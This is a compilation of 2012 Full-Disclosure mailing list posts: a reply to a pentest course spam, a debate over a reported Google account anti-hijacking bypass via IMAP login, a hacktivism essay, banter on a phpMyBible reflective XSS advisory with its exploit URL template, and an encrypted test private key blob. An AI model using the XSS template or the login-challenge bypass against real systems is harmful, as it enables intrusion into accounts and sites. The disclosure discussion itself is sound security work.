make them more secure, by all means encourage them to set up two-factor authentication. -- Mike Hearn | Senior Software Engineer | he...@google.commailto:he...@google.com | Account security team ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ inline: image001.png___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FW: Curso online - Profesional pentesting - Promocion ( 25% de descuento )
Hello Juan. After multiple requests for you to remove me from your unsolicited (and illegal) emails, I see you have refused to do so. This indicates and illustrates your acceptance of a default opt-in until explicit opt-out policy notwithstanding the fact you do not honor the opt-out. Though I still do not wish to receive your mails, I see you are offering penetration testing services. I find this interesting. In order to determine your ability to properly execute on penetration test deliverables, I request your permission to test any and all of your facilities in any way I deem appropriate including (by not limited to) your personal machines, the machines of your coworkers and family, and any other device I deem within scope of my testing. Further, I request you to grant full, unlimited access and authorization for me to test these devices in any way I see fit with full unadulterated impunity. As you have already illustrated your acceptance of a default opt-in until explicit opt-out policy, all I require for your acceptance is for you to send me an email containing any discussions regarding computer security testing or tools. This email serves as notice that further communications regarding pen testing services (or tools) will be an explicit acceptance of the terms set hereinto. This contract will be valid for one year from the date of this email. Again, any further communications regarding services will be your explicit acceptance of these terms. Thanks! Timothy “Thor” Mullen www.hammerofgod.com Thor’s Microsoft Security Bible -Original Message- From: No Reply [mailto:nore...@exploitpack.com] Sent: Tuesday, May 15, 2012 7:39 PM Subject: Curso online - Profesional pentesting - Promocion ( 25% de descuento ) Conviértete en un profesional de la seguridad informatica y aprende a realizar tu mismo un penetration testing. El curso tiene una duración de ( 15 horas de practica en laboratorio ) y se entrega diploma y certificado de asistencia. ( Con examen final aprobado ) El contenido del curso es técnico y practico, ademas se incluye licencia de Exploit Pack ( de regalo ) herramienta la cual utilizaremos para realizar testeos de intrusión. Sobre el curso: El mismo es dictado y desarrollado por Juan Sacco, esta pensado para que los asistentes aprendan como utilizar las ultimas herramientas y tecnicas de intrusion ademas de conocer el transfondo que hay sobre cada una de las posibles vulnerabilidades encontradas en los testeos. Costo total SIN descuento: 200 USD Costo total con descuento: 150 USD ingresando codigo de descuento ( Solo valido para latino america ) Codigo de descuento: 0x0833293 Para otras formas de pago como Western Union o Transferencia, ponerse en contacto. Tipo de curso: Online y en vivo Link de inscripcion: http://www.anymeeting.com/PIID=EE52D6858547 http://www.linkedin.com/redirect?url=http%3A%2F%2Fwww%2Eanymeeting%2Ecom%2FPIID%3DEE52D6858547urlhash=qkS9_t=mbox_mebc Lista de mail con tutoriales y herramientas: http://groups.google.com/group/exploitpack?hl=es La primer clase empieza este sabado 19 de Mayo a las 20:00hs ( GMT -3:00 Buenos Aires ) y vamos realizar una nivelacion y armar el laboratorio para las pruebas No te lo pierdas es una oportunidad unica! Saludos Juan Sacco Exploit Pack ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google Accounts Security Vulnerability
That's what I said. :D Timothy Thor Mullen www.hammerofgod.com Thor's Microsoft Security Bible -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Mike Hearn Sent: Wednesday, May 16, 2012 1:38 PM To: full-disclosure@lists.grok.org.uk Cc: mg...@emitcode.com Subject: Re: [Full-disclosure] Google Accounts Security Vulnerability Hi there full-disclosure, I wanted to respond to the recent post covering the Google real time anti-hijacking system and explain a bit more about what this system is and how it works. For background I am the tech lead of the relevant team, and Daniel Margolis works on it with me. Firstly, I'd like to note that despite what Michael may have observed with his account, performing a programmatic login does not whitelist for web access. Most of the time if you would be challenged via the web then logging in via POP or IMAP would also be denied, and result in a notification email about the blocked login. See here for what this looks like: http://blog.plaxo.com/2012/05/google-account-%E2%80%9Csuspicious-activity%E2%80%9D-next-steps/ There are a small number of edge cases that can cause this rule to break. Unfortunately although Daniel asked for it, Michael has not provided the name of the account in question so we cannot check which one it was. To understand why this is not a problem it's important to understand the design parameters of this security system. The real-time antihijack system was created to solve a specific problem, namely, spammers/scammers turning up at our front door with large numbers of valid passwords. I gave a public talk at the RIPE64 conference last month which provides some background: https://ripe64.ripe.net/archives/video/25/ https://ripe64.ripe.net/presentations/48-AbuseAtScale.pdf (slides) Executive summary: it is no longer unexpected for individual attackers to own on the order of a million valid passwords. These passwords are taken from compromised websites and the hashes reversed using GPUs. We have in the past seen known attackers correctly authenticate to over 30 accounts per second and this problem is structural - it's isn't going to go away any time soon. For this reason we now perform a risk analysis of every login and if we suspect it may not be the real owner of the account, redirect it to identity verification. This is what Michael saw. The primary design principle of the system is to move all our users into the post-password age as gently as possible. The threat model covers attacks that operate at scale and who do not care about the specific accounts they work with. We provide things like 2-step verification, which authenticates you via a device or phone, for handling the stronger threat model of a highly motivated adversary against a specific highly motivated defender. One outcome of this threat model is that if we can protect 95% of accounts from an attacker, that's good enough because it renders their attack uneconomic and they go away. See this paper from Microsoft Research: http://research.microsoft.com/pubs/149885/wheredoalltheattacksgo.pdf For this reason the system will usually fail open if there is a problem of some kind. An example of what can cause the type of behavior Michael saw: if there the risk analysis subsystem misses its deadline the login processing servers will proceed without it. Timeouts are rare but can occasionally happen. There are other cases involving specific types of account history and IP address combinations that could cause what Michael observed. Or there could be a bug :-) It's best to view the risk analysis / id verification system as more like a spam filter than a hard-guarantee security system. It relies heavily on security through obscurity and exploiting weaknesses of very specific opponents, against which it has proven very effective. Analyzing it as if it were a complete replacement for password security will lead only to disappointment. thanks /mike ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google Accounts Security Vulnerability
I'm not sure I understand the issue here - the requirement for someone happening to come across your username and password is a pretext. Logging on to the web interface where you can change password and other personal information as well as verify existing site cookies affords the service the ability to check these sorts of things. But you logged on via IMAP, which is its own service just like POP3 or SMTP. These services can't check where you are or for the existence of a cookie, so I'm not really sure what your expectation is, or why this is being presented as an issue. Am I missing something? Timothy Thor Mullen www.hammerofgod.com Thor's Microsoft Security Bible -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Jason Hellenthal Sent: Saturday, May 12, 2012 9:32 AM To: Michael J. Gray Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Google Accounts Security Vulnerability LMFAO! On Sat, May 12, 2012 at 04:22:30AM -0700, Michael J. Gray wrote: Effective since May 1, 2012. Products Affected: All Google account based services Upon attempting to log-in to my Google account while away from home, I was presented with a message that required me to confirm various details about my account in order to ensure I was a legitimate user and not just someone who came across my username and password. Unable to remember what my phone number from 2004 was, I looked for a way around it. The questions presented to me were: Complete the email address: a**g...@gmail.com Complete the phone number: (425) 4**-***7 Since this was presented to me, I was certain I had my username and password correct. From there, I simply went to check my email via IMAP at the new location. I was immediately granted access to my email inboxes with no trouble. From there, I attempted to log-in to my Google account with the same username and password. To my surprise, I was not presented with any questions to confirm my identity. This completes the steps required to bypass this account hijacking counter-measure. This just goes to show that even the largest corporations that employ teams of security experts, can also overlook very simple issues. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - (2^(N-1)) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google Accounts Security Vulnerability
Logging on to IMAP mail as one would be doing hundreds of times per day is not going to reset the web cookie. If that is what the OP is reporting, I would have to question if his recollection is correct since, by that logic, the password reset feature would never be activated since any other IMAP logon would clear it. If the user logged in, and was presented with the questions as stated, then it probably cleared any requirement since he would have to accept that. Unless he is saying that when presented with the questions he purposefully did not put them in and tried to logon to IMAP which I find odd. Regardless, if you already know the username and password for the email, it doesn't matter anyway no does it? You could always get the mail via IMAP or POP or whatever options were configured in gmail. There wouldn't be any need to go to the web interface in the first place. Now that I know I'm not missing anything, I'll just let this one die on the vine. [Description: Description: Description: Description: Description: Description: Description: Description: Description: TimSig] Timothy Thor Mullen www.hammerofgod.com Thor's Microsoft Security Biblehttp://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727 From: Mateus Felipe Tymburibá Ferreira [mailto:mateusty...@gmail.com] Sent: Tuesday, May 15, 2012 12:21 PM To: Thor (Hammer of God) Cc: Jason Hellenthal; Michael J. Gray; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Google Accounts Security Vulnerability I'm just copying the original message's part that probably answer your question (I did not test it...): From there, I attempted to log-in to my Google account with the same username and password. To my surprise, I was not presented with any questions to confirm my identity. This completes the steps required to bypass this account hijacking counter-measure. Mateus Felipe Tymburibá Ferreira, M. Sc. student at UFAMhttp://portal.ufam.edu.br CISSPhttps://www.isc2.org/cissp/default.aspx, OSCPhttp://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/, OSCEhttp://www.offensive-security.com/information-security-certifications/osce-offensive-security-certified-expert/, OSWPhttp://www.offensive-security.com/information-security-certifications/oswp-offensive-security-wireless-professional/ [http://www.mateustymbu.xpg.com.br/images/CISSP.png]https://www.isc2.org/cissp/default.aspx[http://www.mateustymbu.xpg.com.br/images/OSCP.png]http://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/[http://www.mateustymbu.xpg.com.br/images/OSCE.png]http://www.offensive-security.com/information-security-certifications/osce-offensive-security-certified-expert/[http://www.mateustymbu.xpg.com.br/images/OSWP.png]http://www.offensive-security.com/information-security-certifications/oswp-offensive-security-wireless-professional/ 2012/5/15 Thor (Hammer of God) t...@hammerofgod.commailto:t...@hammerofgod.com I'm not sure I understand the issue here - the requirement for someone happening to come across your username and password is a pretext. Logging on to the web interface where you can change password and other personal information as well as verify existing site cookies affords the service the ability to check these sorts of things. But you logged on via IMAP, which is its own service just like POP3 or SMTP. These services can't check where you are or for the existence of a cookie, so I'm not really sure what your expectation is, or why this is being presented as an issue. Am I missing something? Timothy Thor Mullen www.hammerofgod.comhttp://www.hammerofgod.com Thor's Microsoft Security Bible -Original Message- From: full-disclosure-boun...@lists.grok.org.ukmailto:full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.ukmailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Jason Hellenthal Sent: Saturday, May 12, 2012 9:32 AM To: Michael J. Gray Cc: full-disclosure@lists.grok.org.ukmailto:full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Google Accounts Security Vulnerability LMFAO! On Sat, May 12, 2012 at 04:22:30AM -0700, Michael J. Gray wrote: Effective since May 1, 2012. Products Affected: All Google account based services Upon attempting to log-in to my Google account while away from home, I was presented with a message that required me to confirm various details about my account in order to ensure I was a legitimate user and not just someone who came across my username and password. Unable to remember what my phone number from 2004 was, I looked for a way around it. The questions presented to me were: Complete the email address: a**g...@gmail.commailto:g...@gmail.com Complete the phone number: (425) 4**-***7 Since this was presented to me, I was certain I
Re: [Full-disclosure] cDc Created Hong Kong Blondes and 'Hacktivism' as a Media Hack
Got any decaf? Timothy Thor Mullen www.hammerofgod.com Thor's Microsoft Security Bible -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Wei Honker Sent: Thursday, May 03, 2012 12:24 PM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] cDc Created Hong Kong Blondes and 'Hacktivism' as a Media Hack cDc Created Hong Kong Blondes and 'Hacktivism' as a Media Hack http://weihonker.tumblr.com/ Anonymous is a Lie Anonymous is a lie. Anonymous is built on a false foundation that casts a pale shadow over anything and everything they attempt to accomplish. While born out of the trolls and lulz of the /b/ board on fourchan Anonymous has quickly become an online activist movement. The group has targeted everything from oppressive regimes in the Middle East, to opposition about Internet censorship. They have been launching DDoS attacks from the comfort of their basements while people in the street are literally gunned down and then they have the audacity to claim victory for themselves because they managed to take a website offline for a few hours. These actions, these minor irritations, have given Anonymous the audacity to call themselves hacktivists, a term that is itself a lie. By using the term hackivist or hacktivism Anonymous is helping to perpetuate one of the biggest media hacks of all time and they don't even know it. Pulling pranks on the media has a long history with the computer underground. One of the best examples is the entire movie Hackers which is so full of inside jokes they cease to be funny. Although when you examine the list of technical consultants the lack of humor makes sense. Hackers, the movie, is such a huge media hack the plot is used not once, but twice. The second time with Serena Achtul and the 'True Life show on MTV. The show supposedly illustrates a so called 'hacker' who convinces Serena to follow him around while he attempts to retrieve a disk before the feds do, which is exactly the same plot used in the movie 'Hackers. Even after Serena and MTV where told they were being trolled they chose to air the footage anyway. I don't know who from the computer underground was the first to execute a media hack but some of the best have come from the Cult of the Dead Cow. To give you an idea of just how prolific and proficient the cDc is at hacking the media consider that their slogan is 'World Domination through Media Saturation'. This is nowhere more apparent than the spectacle that was the BO2K release during Defcon in 1999. No software launch in recorded history; including those done by the media savvy Apple Inc., could touch this. Everything from smashing guitars to furry assless chaps to bad rap music with all the cDc members prancing around on stage as if it was the second coming. All that spectacle for nothing more than a remote access tool, something with almost the exact same feature set as PC Anywhere except that it runs on a different port number. Even Microsoft themselves said that BO2K wasn't a threat but the press ate it up anyway and cDc proved again that they were in fact master media manipulators. Hactivism is another brainchild of cDc designed to fool and trick the media and all who choose to be associated with the term. The creation of the term is supposedly well documented as being first used by cDc member Omega in an IRC chat room in 1996. But close examination of the hacktivism Wikipedia page and that page's history shows a second possible source for the term, that of techno-culture writer Jason Sack in a piece about media artist Shu Lea Cheang, published in InfoNation in 1995 which pre-dates cDc's claim to the term. This co-option of the term itself is part of cDc's plan to execute the biggest media hack of all time encompassing all of 'hacktivism'. But co-opting the term itself is not enough. cDc felt they needed something to take advantage of the term and to plunge it fully into the media spotlight. They came up with a fictitious international hacking group, a group who would only attack corporations that did not support human rights, and so the Hong Kong Blondes were born. Reading the initial interview between the supposed Hong Kong Blondes leader 'Blondie Wong' and the cDc member 'Oxblood Ruffin' in cDc #356 now, fourteen years later, makes the entire ruse plainly obvious. Arik Hesseldahl, who ran the initial story in Wired based solely on this interview, with absolutely no corroborating evidence in the first place, has since privately expressed his doubts about the story. By publishing this article he unwittingly became the first rube in a long line of media rubes that the cDc played with ever increasing dexterity. Hesseldahl has most likely not publicly expanded on his misgivings over the story as it would draw attention to his original reservations and expose the fact that he failed to
Re: [Full-disclosure] Vulnerability in Gentoo hardened
Which always turns out to be the best... Sent from my Windows Phone From: valdis.kletni...@vt.edu Sent: 4/24/2012 9:16 AM To: Milan Berger Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Vulnerability in Gentoo hardened On Tue, 24 Apr 2012 17:36:55 +0200, Milan Berger said: if you read his advisories and 0-days you know: It's not a joke... I always thought it was misunderstood performance art... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] phpMyBible 0.5.1 Mutiple XSS
You dropped a FD on the BIBLE?? Dude, you're going straight to Hacker Hell! :) Timothy Thor Mullen www.hammerofgod.com Thor's Microsoft Security Bible -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Thomas Richards Sent: Sunday, April 22, 2012 8:09 AM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] phpMyBible 0.5.1 Mutiple XSS # Exploit Title: phpMyBible 0.5.1 Mutiple XSS # Date: 04/15/12 # Author: G13 # Twitter: @g13net # Software http://sourceforge.net/projects/phpmybible/?source=directory # Version: 0.5.1 # Category: webapps (php) # # Description # phpMyBible is an online collaborative project to make an e-book of the Holy Bible in as various language as possible. phpMyBible is designed to be flexible to all readers while maintaining the authenticity and originality of the Holy Bible scripture. # Vulnerability # phpMyBible has multiple XSS vulnerabilities. When reading a section of the Bible; both the 'version' and 'chapter' variables are prone to reflective XSS. # Exploit # http://localhost/index.php?book=1version=[XSS]chapter=[XSS] # Vendor Notification # 04/15/12 - Vendor Notified 04/22/12 - No response, disclos ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] phpMyBible 0.5.1 Mutiple XSS
I think MSFT would sue God if that's what he called it :) Time for a How Would Jesus Code bumper sticker! Timothy Thor Mullen www.hammerofgod.com Thor's Microsoft Security Bible -Original Message- From: valdis.kletni...@vt.edu [mailto:valdis.kletni...@vt.edu] Sent: Sunday, April 22, 2012 5:23 PM To: Thor (Hammer of God) Cc: Thomas Richards; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] phpMyBible 0.5.1 Mutiple XSS On Sun, 22 Apr 2012 19:59:46 -, Thor (Hammer of God) said: You dropped a FD on the BIBLE?? Dude, you're going straight to Hacker Hell! :) Wait, wouldn't that require that the unerring Word of God was buggy? ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Thor's Private Key
Please ignore (again). I need this key here to parse some FD archives. ?xml version=1.0? !--TGP - Thor's Godly Privacy: KeyFob XML Document-- KeyFobs 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/KeyNaCl/KeyFobName /KeyFobs [Description: Description: Description: Description: Description: Description:
Re: [Full-disclosure] Thor's Private Key
You must not have read closely then :) The GPG key structure is a collection of all keys in a single database. If you want to use different keys, you have to move entire keyrings around. Exportation of keys is in ascii, but you can't programmatically access any elements of the keys or the encrypted data itself with an open format. By default, the encrypted data is all binary, and if you ascii armor the actual data, you've got multiple steps to decrypt it and can't identify key information from it. GPG must be installed on target systems, and you have to be an administrator to do so. TGP runs as a single executable. TGP has full access to the X.509 Windows Certificate Store and can validate PKI infrastructures based on these certificates. GPG can't even access the cert store. GPG has no provisions for key management at all. TGP interfaces with my Rainmaker API to provide off-site key management and verification based on permissions and certificate trusts. As such, the client never has to have the keys in their possession, and the keys never touch the file system. You can't do that with GPG. TGP encrypted data is cloud ready for SOAP/XML -based API structures. You can't do that with GPG. TGP also is the only multi-platform encryption tool where you can encrypt the data on the PC, store it in the cloud, and then decrypt it on Win7Phone with even TGPMobile taking advantage of the Rainmaker API key management system. So for mobile applications you also never have the key on the device. TGP is trivially easy to use. Average computer people can use it (and do). I've seen PGP/GPG deployments fail miserable because people couldn't figure out how to use GPG. Most importantly, I can make it do whatever I want it to do without having to parse through mounts of pieced together code authored by who knows who. Those are some of the differences - not that it matters, of course. I've made no claims regarding any differences to GPG good or bad. I comment about PGP on my site, but that's it. So feel free to LOL all day, but I really don't see what your point is. t -Original Message- From: Jason Hellenthal [mailto:jhellent...@dataix.net] Sent: Sunday, April 08, 2012 5:41 PM To: Thor (Hammer of God) Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Thor's Private Key LoL WuT! Whats the difference between just encrypting your data with GnuPG... and yes I read your about TGP page lol. On Sun, Apr 08, 2012 at 10:54:34PM +, Thor (Hammer of God) wrote: Please ignore (again). I need this key here to parse some FD archives. ?xml version=1.0? !--TGP - Thor's Godly Privacy: KeyFob XML Document-- KeyFobs KeyFobNameTGPFobNamePrivateTest/FobNamePublicKey/PublicKeyE ncPrivateKey193PM88EjC/C7DtVH/UWzI9ALhLyxr/vbeV95vGvVPlw5KKH3szdnzCMs 7cFWC7Hq2vqxIVwIDMrp9fG43mPnS1+Ya/96TmBk88gCcwdkkKlc4UDHDj73mEhvIra0P0 /L2VZDxX9rFbv2rEKMTKLXnW6dMSdJbfCN1AOI+jCsv+9pm7bcbSCRMaOJZoXUHjZiW1gp unUqi0zgbXYo10WGZJhfYa1uL9x4NuUjZ9P6m9haum8T1YQiV7+EZwbRl+9wD4bZ97pbP0 d7fikCJFw/0VaN2EJpgpzlxDEmTWpaAomKk/3gd4TAo+iM53XX3uwwL0g8yXWqgllZRLZS 9u5jS6ZPzNwhy8n4+FER7as4IpDZwOjg9vKNyBPYNN2xPOh6gOBKUZERRkuyp0zTyOZPTH 0D3/xlCqXlfhyqzntmxSpiCH2dzuhJR8Rj+LJcTTgzNsVNo2zSq9BfdTLZNsV5g2l/2PTe cA9DbDWrDQHBmMbSIbxqBLtxD+kVUm1XPf1C/5bhfbuZroCXGGgE6NykBpH5rThfRDV/7R 